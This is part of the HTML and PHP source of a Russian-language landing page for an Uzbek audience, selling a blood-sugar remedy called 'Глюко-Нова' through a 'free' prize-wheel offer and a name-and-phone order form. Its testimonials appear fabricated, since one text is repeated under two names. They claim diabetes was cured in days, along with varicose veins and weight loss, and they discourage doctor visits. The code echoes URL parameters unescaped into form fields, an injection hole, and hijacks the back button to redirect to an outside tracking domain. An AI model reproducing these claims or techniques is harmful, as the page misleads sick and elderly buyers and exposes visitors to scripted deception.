                                                            <div class="price__item-title">
                                                                Новая цена:
                                                            </div>
                                                            <div class="price__item-value price__item-value--new">
                                                                <span class="x_price_current">БЕСПЛАТНО</span>
                                                                <span class="x_currency"></span>
                                                                *
                                                            </div>
                                                        </div>
                                                    </div>
                                                    <form method="post" action="order.php" class="x_order_form form">
                                                        <input type="hidden" name="sub1" value="{subid}">
                                                        <input type="hidden" name="sub2" value="<?php echo isset($_GET['n']) ? $_GET['n'] : 'Buyers'; ?>">
                                                        <input type="hidden" name="sub3" value="{offer_id}">
                                                        <input type="hidden" name="tax" value="<?=@$_GET['tax']?>">
                                                        <input class="input form__input" name="name" required="" placeholder="Введите ваше имя" type="text" value="" autocomplete="name">
                                                        <input class="input form__input" name="phone" required="" placeholder="Введите ваш номер телефона" type="tel" value="+998" autocomplete="tel">
                                                        <button class="btn form__btn" type="submit">
                                                            Отправить
                                                        </button>
                                                    </form>
                                                    <p class="ft">
                                                        * Работает с товарами в пределах канала распределения
                                                    </p>
                                                </div>
                                            </div>
                                            <div class="spin-result-wrapper">
                                                <div class="pop-up-window">
                                                    <div class="close-popup"></div>
                                                    <h1 class="popup-title">Поздравляем!</h1>
                                                    <p class="ruletka-p pop-up-text">Вы можете получить Глюко-Нова</p>
                                                    <button class="pop-up-button">OK</button>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                            <div id="comments">
                                <h2 class="spoint">Отзывы</h2>
                                <div class="row-y-item">
                                    <div class="info">
                                        <div class="coment_ava">
                                            <b>
                                                <img alt="img" src="images/1.jpg" />
                                            </b>
                                        </div>
                                        <span class="row-y-name">
                                            <b>
                                                Азиза Абдурахманова
                                                <span class="randdate date-6"> </span>
                                            </b>
                                        </span>
                                        <div class="pg">
                                            Большое спасибо за то, что предоставили пенсионерам отличную возможность! Я
                                            прошла курс с <b>
                                                <a href="#order0">Глюко-Нова</a>
                                            </b>. Мое уровень сахара в крови ужасно повышалось, теперь оно стабильно. Колени
                                            болели постоянно, а теперь не болят. Головные боли исчезли. Горечь во рту
                                            прошла. И у меня множество других положительных изменений. Я чувствую себя
                                            моложе!
                                        </div>
                                    </div>
                                </div>
                                <div class="row-y-item">
                                    <div class="info">
                                        <div class="coment_ava">
                                            <b>
                                                <img alt="img" src="images/2.jpg" />
                                            </b>
                                        </div>
                                        <span class="name">
                                            <b>
                                                Бахтиёр Хасанов
                                                <span class="randdate date-6"> </span></b>
                                        </span>
                                        <div class="pg">
                                            Я заказал
                                            <a href="#order0">Глюко-Нова</a>
                                            . Надеюсь, что препарат действительно поможет. Мне 64 года, и я чувствую себя
                                            старым. Я много читал о контроле уровня сахара. Хочу попробовать это на себе.
                                        </div>
                                    </div>
                                </div>
                                <div class="row-y-item">
                                    <div class="info">
                                        <div class="coment_ava">
                                            <b>
                                                <img alt="img" src="images/3.jpg" />
                                            </b>
                                        </div>
                                        <span class="name">
                                            <b>
                                                Шахноза Турсунова
                                                <span class="randdate date-6"> </span></b>
                                        </span>
                                        <div class="pg">
                                            <b style="text-transform: uppercase">Глюко-Нова</b> - ЛУЧШИЙ ЛЕКАРСТВО ИЗ ВСЕХ.
                                            Раньше я принимала Эсидрекс, потом Эринит. Да, я знаю, что это устаревшие
                                            препараты. Но я не люблю ходить к врачу. Иногда принимала таблетки, когда
                                            повышалось сахара или болело сердце. Но внезапно они перестали помогать. Я
                                            пошла к врачу, и он посоветовал мне попробовать новое средство <b>
                                                <a href="#order0">Глюко-Нова</a>
                                            </b> (врач был молодой, наверное, он все еще верит, что медицина должна быть для
                                            людей, а не для зарабатывания денег!). <b>
                                                <a href="#order0">Глюко-Нова</a>
                                            </b> помог мне с первого раза: сахара сразу же снизилось, но я продолжила курс по
                                            совету врача. Через 3 недели я забыла, что такое диабет. Варикоз, мучивший
                                            меня 10 лет, исчез! Также я решала женскую проблему, и и следа от нее не
                                            осталось. Чувствую себя прекрасно, как в молодости!
                                            <img src="./images/cp1.jpg" alt="" style="display: block;width: 100%;max-width: 350px;margin-left: 0;">
                                        </div>
                                    </div>
                                </div>
                                <div class="row-y-item">
                                    <div class="info">
                                        <div class="coment_ava">
                                            <b>
                                                <img alt="img" src="images/4.jpg" />
                                            </b>
                                        </div>
                                        <span class="name">
                                            <b>
                                                Камронбек Ниёзов
                                                <span class="randdate date-5"> </span></b>
                                        </span>
                                        <div class="pg">
                                            Я тоже проходил курс с <b>
                                                <a href="#order0">Глюко-Нова</a>
                                            </b>. Лично мне это очень помогло. Здоровье улучшилось. Рекомендую всем пожилым
                                            людям.
                                        </div>
                                    </div>
                                </div>
                                <div class="row-y-item">
                                    <div class="info">
                                        <div class="coment_ava">
                                            <b>
                                                <img alt="img" src="images/5.jpg" />
                                            </b>
                                        </div>
                                        <span class="name">
                                            <b>
                                                Гулсара Бобоева
                                                <span class="randdate date-4"> </span></b>
                                        </span>
                                        <div class="pg">
                                            Подтверждаю. Это гениальное лекарство. Раньше почти каждую ночь у меня болела
                                            голова, невыносимая боль, даже обезболивающие не помогали. Потом я узнала, что
                                            головная боль из-за сахара. Но не суть. Одна соседка порекомендовала мне <b>
                                                <a href="#order0">Глюко-Нова</a>
                                            </b>, и я сделала заказ со скидкой, как было указано на странице. Я стала совершенно
                                            другим человеком за 2 месяца! Поняла, что не жила, пока не стабилизировала сахар! Боли
                                            в голове больше не беспокоят, варикоз исчез, а самое главное — я похудела на 20
                                            кг! С 94 до 74 килограмм! Вот что значит нормализовать циркуляцию!
                                            <img src="./images/cp2.jpg" alt="" style="display: block;width: 100%;max-width: 350px;margin-left: 0;" loading="lazy">
                                        </div>
                                    </div>
                                </div>
                                <div class="row-y-item">
                                    <div class="info">
                                        <div class="coment_ava">
                                            <b>
                                                <img alt="img" src="images/6.jpg" />
                                            </b>
                                        </div>
                                        <span class="name">
                                            <b>
                                                Дилшоджан Султанов
                                                <span class="randdate date-4"> </span></b>
                                        </span>
                                        <div class="pg">
                                            Согласна. Это очень эффективное средство при проблемах с уровнем сахара в крови!
                                            Сейчас глюкоза в пределах 4,8–5,5 ммоль/л.
                                        </div>
                                    </div>
                                </div>
                                <div class="row-y-item">
                                    <div class="info">
                                        <div class="coment_ava">
                                            <b>
                                                <img alt="img" src="images/7.jpg" />
                                            </b>
                                        </div>
                                        <span class="name">
                                            <b>
                                                Рано Рахматуллаева
                                                <span class="randdate date-3"> </span></b>
                                        </span>
                                        <div class="pg">
                                            Я рискнула, и не пожалела. Если у вас проблемы с сосудами, рекомендую. Я не
                                            заметила побочных эффектов и довольна результатом.
                                        </div>
                                    </div>
                                </div>
                                <div class="row-y-item">
                                    <div class="info">
                                        <div class="coment_ava">
                                            <b>
                                                <img alt="img" src="images/8.jpg" />
                                            </b>
                                        </div>
                                        <span class="name">
                                            <b>
                                                Азизбек Юсупов
                                                <span class="randdate date-2"> </span></b>
                                        </span>
                                        <div class="pg">
                                            Огромное спасибо за информацию об этом лекарстве. Я долго искал что-то подобное.
                                            С нетерпением жду свой заказ! Спасибо!
                                        </div>
                                    </div>
                                </div>
                                <div class="row-y-item">
                                    <div class="info">
                                        <div class="coment_ava">
                                            <b>
                                                <img alt="img" src="images/9.jpg" />
                                            </b>
                                        </div>
                                        <span class="name">
                                            <b>
                                                Фарходбек Ташпулатов
                                                <span class="randdate date-2"> </span></b>
                                        </span>
                                        <div class="pg">У меня была диабет... теперь её нет, все прошло за 10 дней!
                                            Спасибо за это!
                                        </div>
                                    </div>
                                </div>
                                <div class="row-y-item">
                                    <div class="info">
                                        <div class="coment_ava">
                                            <b>
                                                <img alt="img" src="images/10.jpg" />
                                            </b>
                                        </div>
                                        <span class="name">
                                            <b>
                                                Нодирбек Исмаилов
                                                <span class="randdate date-2"> </span></b>
                                        </span>
                                        <div class="pg">
                                            Спасибо за <b>
                                                <a href="#order0">Глюко-Нова</a>
                                            </b>. Я попробовал, почувствовал значительное облегчение. Посмотрим, что будет через
                                            неделю. Но сахара больше не поднимается, и я этого не чувствую. Думаю, что все
                                            будет хорошо!
                                            <img src="./images/cp3.jpg" alt="" style="display: block;width: 100%;max-width: 350px;margin-left: 0;" loading="lazy">
                                        </div>
                                    </div>
                                </div>
                                <div class="row-y-item">
                                    <div class="info">
                                        <div class="coment_ava">
                                            <b>
                                                <img alt="img" src="images/10.jpg" />
                                            </b>
                                        </div>
                                        <span class="name">
                                            <b>
                                                Исломбек Назаров
                                                <span class="randdate date-2"> </span></b>
                                        </span>
                                        <div class="pg">
                                            Спасибо за <b>
                                                <a href="#order0">Глюко-Нова</a>
                                            </b>. Я попробовал, почувствовал значительное облегчение. Посмотрим, что будет через
                                            неделю. Но сахара больше не поднимается, и я этого не чувствую. Думаю, что все
                                            будет хорошо!
                                        </div>
                                    </div>
                                </div>
                                <div class="row-y-item">
                                    <div class="info">
                                        <div class="coment_ava">
                                            <b>
                                                <img alt="img" src="images/11.jpg" />
                                            </b>
                                        </div>
                                        <span class="name">
                                            <b>
                                                Камолиддин Рахматов
                                                <span class="randdate date-2"> </span></b>
                                        </span>
                                        <div class="pg">
                                            Я тоже начал использовать это средство, чтобы нормализовать уровень сахара. Очень хорошее
                                            средство!
                                        </div>
                                    </div>
                                </div>
                                <div class="middle">
                                    <div style="text-align: center">
                                        <b>
                                            <a href="#order0" class="button scroll1">Заказать со скидкой</a>
                                        </b>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                <div style="clear: both"></div>
            </div>
        </div>
        <hr />
    </div>
    <footer>
        <p style="text-align: center; font-size: 18px">© 2025 Все права защищены</p>
    </footer>
    <script async="">
    var LAZY = document.querySelectorAll('img')
    for (let i = 0; i < LAZY.length; i++) {
        LAZY[i].setAttribute('loading', 'lazy')
    }
    </script>
    <script src="src/doors.js"></script>
    <script src="js/script.js"></script>
    <script>
    $('a:not([id="#order0"])').addClass('to_form');
    $(".to_form").on("touchend click", function(e) {
        e.preventDefault();
        $('body,html').animate({
            scrollTop: $('#order0').offset().top - 25
        }, 400);
    });

    const orderForms = document.querySelectorAll('form');
    let isFormSubmitting = false;

    function disableAllSubmitButtons() {
        orderForms.forEach(form => {
            const submitButtons = form.querySelectorAll('[type="submit"]');
            submitButtons.forEach(button => {
                button.disabled = true;
                button.setAttribute('style', 'cursor: no-drop !important;');
                button.style.opacity = 0.5;
            });
        });
    }

    orderForms.forEach(form => {
        form.addEventListener('submit', function(event) {
            if (isFormSubmitting) {
                event.preventDefault();
                return;
            }
            isFormSubmitting = true;
            disableAllSubmitButtons();
        });
    });
    </script>
    <script src="back.js"></script>
    <script>
    document.addEventListener("DOMContentLoaded", function() {
        window.vitBack("https://net-quantio.bond/9xy89G?a={a}&c={c}&tax={tax}&n={n}/", true);
    });
    </script>
</body>

</html>